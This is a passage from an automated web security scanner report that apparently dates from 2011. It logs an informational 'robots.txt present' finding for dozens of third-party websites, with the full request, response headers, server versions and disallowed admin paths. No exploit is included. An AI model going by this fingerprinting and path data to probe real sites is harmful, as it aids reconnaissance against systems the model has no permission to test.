Host:	http://www.wcsh6.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wcsh6.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 19 Aug 2009 14:34:52 GMT
Accept-Ranges: bytes
ETag: "04e5536da20ca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Content-Length: 497
Date: Tue, 03 May 2011 10:26:18 GMT
Connection: close

Sitemap: http://www.wcsh6.com/sitemap.axd
User-agent: *
Disallow: /_bti
Disallow: /_data
Disallow: /aspnet_client
Disallow: /assetpool
Disallow: /bin
Disallow: /genthumb
Disallow: /graphics
D
...[SNIP]...

26.1115. http://www.wcwelding.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wcwelding.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wcwelding.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:53 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.wcwelding.com/5tPW89Ff.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Disal
...[SNIP]...

26.1116. http://www.wdasfm.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wdasfm.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wdasfm.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4191442127
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 10:29:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:29:14 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

26.1117. http://www.we7.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.we7.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.we7.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=133E252B96A9E4451270651B51AA7E8C; Domain=.we7.com; Path=/
p3p: policyref="/static/p3p/we7.v1.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa TELi OTPa OUR SAMa OTRa IND UNI COM NAV DEM STA LOC"
Content-Type: text/plain;charset=UTF-8
Content-Length: 433
Date: Tue, 03 May 2011 11:18:50 GMT
Connection: close

# robots.txt for www.we7.com

User-agent: *
Disallow: /scripts/
Disallow: /CSS/
Disallow: /images/
Disallow: /SITE=WE7/
Disallow: /*?searchOrder
Disallow: /*?firstLetter
Disallow: /*&searchOrder
Disa
...[SNIP]...

26.1118. http://www.web-stat.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.web-stat.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.web-stat.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:01 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 11 Jun 2010 09:26:52 GMT
ETag: "e410b8-735-bd3e0f00"
Accept-Ranges: bytes
Content-Length: 1845
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.web-stat.net/sitemap.xml
Disallow: /stats/
Disallow: /forums/
Disallow: /ENGLISH/
Disallow: /world_map.cgi
Disallow: /world_map_public.pl
Disallow: /popup_details.pl

...[SNIP]...

26.1119. http://www.webdesign.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.webdesign.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webdesign.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:26 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Set-Cookie: kohanasession=67d6be4470c1485f091cffbf5a6bff95; expires=Tue, 03-May-2011 12:30:26 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=67d6be4470c1485f091cffbf5a6bff95; expires=Tue, 03-May-2011 12:30:26 GMT; path=/
Vary: Accept-Encoding
Content-Length: 92
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /search
Disallow: /forum
Disallow: /print
Disallow: /advanced-search

26.1120. http://www.webreference.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.webreference.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webreference.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:50 GMT
Server: Apache
Last-Modified: Wed, 08 Dec 2010 13:33:58 GMT
ETag: "6d62e-22b-4cff8946"
Accept-Ranges: bytes
Content-Length: 555
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /RealMedia/ads/
Disallow: /ads/
Disallow: /fcgi-bin/ipeclick.cgi/
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /click.ng/
Disallow: /image.ng/
Disallow: /fax/
Disallow: /
...[SNIP]...

26.1121. http://www.wect.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wect.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wect.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:ac8"
Cteonnt-Length: 818
Expires: Tue, 03 May 2011 10:16:16 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 10:16:16 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

26.1122. http://www.weldershop.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weldershop.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weldershop.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:54 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 30 Mar 2010 20:15:28 GMT
ETag: "634c01f-89-4830a4a66b800"
Accept-Ranges: bytes
Content-Length: 137
Connection: close
Content-Type: text/plain

# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.weldershop.info/sitemap.xml
# END XML-SITEMAP-PLUGIN

User-agent: *
Disallow: /view.php

26.1123. http://www.wellnessletter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wellnessletter.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellnessletter.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:01 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26
Last-Modified: Tue, 09 Sep 2003 15:25:31 GMT
ETag: "192a06-47-3f5df0eb"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/plain

# robots.txt for http://www.example.com/

User-agent: *
Disallow: /pdf

26.1124. http://www.wengers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wengers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wengers.com

Response

HTTP/1.1 200 OK
Content-Length: 132
Content-Type: text/plain
Last-Modified: Tue, 28 Jun 2005 17:03:24 GMT
Accept-Ranges: bytes
ETag: "0d64c4b37cc51:4e4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:55:58 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.1125. http://www.werdyo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.werdyo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.werdyo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:35 GMT
Server: Apache
Last-Modified: Sat, 09 Jan 2010 21:02:02 GMT
ETag: "22000000049031-21-47cc19da3d1cc"
Accept-Ranges: bytes
Content-Length: 33
Vary: Accept-Encoding
Cache-Control: public
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ads

26.1126. http://www.werner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.werner.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.werner.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:25 GMT
Last-Modified: Thu, 11 Nov 2010 20:14:29 GMT
ETag: "698e6-127-9f053340"
Accept-Ranges: bytes
Content-Length: 295
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /assets/
Disallow: /CFIDE/
Disallow: /com/
Disallow: /include/
Disallow: /logs/
Disallow: /MMWIP/
Disallow: /openitems/
Disallow: /templates/

Disallow: /_mm/
Disall
...[SNIP]...

26.1127. http://www.westathome.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westathome.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westathome.com

Response

HTTP/1.1 200 OK
Content-Length: 56
Content-Type: text/plain
Last-Modified: Wed, 28 May 2008 08:04:06 GMT
Accept-Ranges: bytes
ETag: "09f5d6699c0c81:44cc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:51:36 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /templates/

26.1128. http://www.westendmotorsports.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westendmotorsports.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westendmotorsports.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Tue, 15 Mar 2011 21:40:31 GMT
ETag: "fc157-21f-49e8c470591c0"
Accept-Ranges: bytes
Content-Length: 543
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /personal/
Disallow: /includes/
Disallow: /cgi-bin/
Disallow: /banned/
Disallow: /blocked.php
Disallow: /dev/
Disallow: /development/
Disallow: /development
Disallow: /images/

...[SNIP]...

26.1129. http://www.westport-news.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westport-news.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westport-news.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 20:19:03 GMT
ETag: "c7-5f5b5bc0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: public
Age: 0
Expires: Tue, 03 May 2011 11:10:36 GMT
x-cdn: Cotendo
Connection: close

Sitemap: http://www.westport-news.com/sitemap.xml
Sitemap: http://www.westport-news.com/sitemap_news.xml
User-agent: *
Allow: /
Disallow: /?controllerName=search
Disallow: /?controllerName=emailThis

26.1130. http://www.whatsonxiamen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatsonxiamen.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whatsonxiamen.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:17 GMT
Server: Apache/2.2.16 (Win32) PHP/5.2.14
Last-Modified: Thu, 21 Oct 2010 04:12:38 GMT
ETag: "100000000052d-35-49318bc8ab1bb"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /AFCadminXIAMEN/

26.1131. http://www.wheelessonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wheelessonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wheelessonline.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:44 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 11 Nov 2008 19:55:09 GMT
ETag: "47489b-1e-41b94140"
Accept-Ranges: bytes
Content-Length: 30
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ads/

26.1132. http://www.wholesalecostumeclub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wholesalecostumeclub.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wholesalecostumeclub.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:06 GMT
Server: Apache
ETag: W/"336-1298479893000"
Last-Modified: Wed, 23 Feb 2011 16:51:33 GMT
Content-Length: 336
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /jsp/shop.jsp
Disallow: /jsp/
Disallow: /girls+costumes/
Disallow: /boys+costumes/
Disallow: /womens+costumes/
Disallow: /mens+costumes/
Disallow: /infant+todd
...[SNIP]...

26.1133. http://www.wholesaledir.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wholesaledir.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wholesaledir.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:07 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
Last-Modified: Tue, 08 Jul 2008 10:48:30 GMT
ETag: "9f4081a-a7-45180eebefb80"
Accept-Ranges: bytes
Content-Length: 167
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /manage/
Disallow: /images/
Disallow: /html_email/
Disallow: /includes/

Sitemap: http://www.wholesaledir.com/sitemap.xml

26.1134. http://www.wholesalefloral.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wholesalefloral.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wholesalefloral.com

Response

HTTP/1.1 200 OK
Content-Length: 141
Content-Type: text/plain
Last-Modified: Fri, 18 Mar 2011 13:57:34 GMT
Accept-Ranges: bytes
ETag: "0f7cd6e74e5cb1:94de"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:40:09 GMT
Connection: close

User-Agent: *
Disallow: /cgi-bin/
Sitemap: http://www.wholesalefloral.com/google_sitemap.asp
Disallow: /search/
Disallow: /images/

26.1135. http://www.whonamedit.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whonamedit.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whonamedit.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:03:29 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 27 Jan 2011 18:38:23 GMT
ETag: "1f85ff-20-49ad8411ee5c0"
Accept-Ranges: bytes
Content-Length: 32
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/

26.1136. http://www.wichealth.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wichealth.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wichealth.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 14 Feb 2011 16:08:59 GMT
Accept-Ranges: bytes
ETag: "c5e73c7d61cccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:42:30 GMT
Connection: close
Content-Length: 114

User-agent: *
Disallow: /resizer.aspx
Disallow: /Services/
Disallow: /css/HttpCombiner.ashx
Disallow: /*.axd

26.1137. http://www.wideanglesoftware.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wideanglesoftware.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wideanglesoftware.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:25 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 01 Oct 2009 11:47:06 GMT
ETag: "49007ce-94-474de34e7a280"
Accept-Ranges: bytes
Content-Length: 148
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /support_original
Disallow: /support/staff
Disallow: /registration/staff
Disallow: /cgi-bin
Disallow: /touchcopy/index1.html

26.1138. http://www.wikifeet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wikifeet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wikifeet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:25 GMT
Server: Apache/2.2.11 (Ubuntu) mod_ssl/2.2.11 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 14 Jan 2010 17:58:33 GMT
ETag: "6194-27-47d23a2a6a440"
Accept-Ranges: bytes
Content-Length: 39
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /*?sort

26.1139. http://www.wildernesscollege.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wildernesscollege.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wildernesscollege.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:29:46 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.wildernesscollege.com/TRP1kmsh.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dy
...[SNIP]...

26.1140. http://www.willistonherald.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.willistonherald.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.willistonherald.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Tue, 03 May 2011 10:18:56 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Last-Modified: Mon, 30 Aug 2010 19:17:33 GMT
Real-Hostname: willistonherald.com
Content-Length: 1175
Connection: close
X-Cache-Info: cached

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebo
...[SNIP]...

26.1141. http://www.willyouhost.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.willyouhost.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.willyouhost.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:55 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 07:04:45 GMT
ETag: "3105a-88-490bfa4d05eba"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.1142. http://www.windows-vista-update.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.windows-vista-update.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.windows-vista-update.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:35 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.windows-vista-update.com/QMmh9mi8.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow:
...[SNIP]...

26.1143. http://www.windsorstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.windsorstore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.windsorstore.com

Response

HTTP/1.1 200 OK
Content-Length: 94
Content-Type: text/plain
Last-Modified: Wed, 03 Dec 2008 21:55:03 GMT
Accept-Ranges: bytes
ETag: "37d81ecc9155c91:b67"
Server: Microsoft-IIS/6.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: Covella
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:12:54 GMT
Connection: close

User-agent: *
Disallow: /search.aspx

Sitemap: http://www.windsorstore.com/sitemap_xml.aspx

26.1144. http://www.wingstuff.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wingstuff.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wingstuff.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 01 Jun 2009 22:06:37 GMT
ETag: "3cf8b9a-c8-a3d45540"
Accept-Ranges: bytes
Content-Length: 200
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=604800
Expires: Tue, 10 May 2011 10:31:39 GMT
Vary: Accept-Encoding
Connection: close

User-agent: ia_archiver
Disallow: /
User-Agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /includes/
User-agent: Googlebot-Image
Disallow: /
User-agent Googlebot
Disallow: /images/

26.1145. http://www.winhelponline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winhelponline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.winhelponline.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 31 Mar 2009 12:55:38 GMT
ETag: "b81770-298-b732c680"
Accept-Ranges: bytes
Content-Length: 664
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:16:29 GMT
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /articlerss
Disallow: /blogrss
Disallow: /tmp
Disallow: /attachments
Disallow: /cache
Disallow: /newsrss
Disallow: /newsrss.php
Disallow: /blogrss.php
Disallow: /articlerss.php
...[SNIP]...

26.1146. http://www.winnipesaukee.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnipesaukee.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.winnipesaukee.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:11 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Sun, 10 Apr 2011 16:50:16 GMT
ETag: "63e934f-1fd-40e18200"
Accept-Ranges: bytes
Content-Length: 509
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.winnipesaukee.com/

User-agent: *
Disallow: /adpeeps/
Disallow: /castle/
Disallow: /classifieds/
Disallow: /tempadmin/
Disallow: /admin/
Disallow: /ads/
Disallow:
...[SNIP]...

26.1147. http://www.wireless-driver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wireless-driver.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wireless-driver.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 03 May 2011 10:31:34 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Vary: Cookie
X-Pingback: http://www.wireless-driver.com/xmlrpc.php

User-agent: *
Disallow:

Sitemap: http://www.wireless-driver.com/sitemap.xml.gz

26.1148. http://www.wofford.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wofford.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wofford.edu

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 28 Nov 2007 20:59:38 GMT
Accept-Ranges: bytes
ETag: "0d96a96132c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:24:18 GMT
Connection: close
Content-Length: 821

User-agent: *
Disallow: /1998/
Disallow: /admin/
Disallow: /arboretumorig/
Disallow: /App_WebReferences/
Disallow: /App_Themes/
Disallow: /App_Code/
Disallow: /aspnet_client/
Disallow: /AssetM
...[SNIP]...

26.1149. http://www.womensenews.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.womensenews.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.womensenews.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:21 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Mon, 27 Oct 2008 00:23:08 GMT
ETag: "1640e91-65b-45a3122a55300"
Accept-Ranges: bytes
Content-Length: 1627
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

26.1150. http://www.wood-stove.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wood-stove.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wood-stove.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:44 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 21 Nov 2008 23:06:00 GMT
ETag: "84a473e-2ce-45c3b16ab6600"
Accept-Ranges: bytes
Content-Length: 718
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /mcp/
Disallow: /themes/
Disallow: /account.aspx
Disallow: /register.aspx
Disallow: /change-password.aspx
Disallow: /send-password.aspx
Disallow: /order-history.aspx
...[SNIP]...

26.1151. http://www.woodheat.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woodheat.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.woodheat.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:36 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 17:00:48 GMT
ETag: "7e5c020-11d-4d750f40"
Accept-Ranges: bytes
Content-Length: 285
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
